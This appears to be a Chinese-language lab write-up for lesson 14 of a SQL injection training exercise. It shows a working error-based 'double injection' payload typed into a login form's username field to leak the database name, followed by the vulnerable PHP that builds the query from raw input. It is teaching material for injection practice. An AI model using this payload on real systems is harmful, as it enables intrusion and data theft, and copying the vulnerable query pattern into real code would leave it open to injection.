Lesson-14
Double Injection - Single quotes - String - With twist
首先进入欢迎界面。
构造如图所示表单:
点击提交后没有任何错误信息。
将上图中的单引号改为双引号
重新提交表单:
发现报错了。
分析原因应该是我们加入的双引号,导致$username后面的双引号和¥password前的双引号闭合了,导致$password后面的那个双引号没有闭合。
构造如下表单:
点击Submit后,结果如图:
但是还是没有提供任何信息。
还是利用Double Injection。
username为:
foo" union select count(*),concat(database(), '#' , floor (rand()*2))as a from information_schema.tables group by a;
password任意。
刷新多次后得到:
得到数据库名称为security。
同理还可以得到其他信息。
最后后台php源码:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";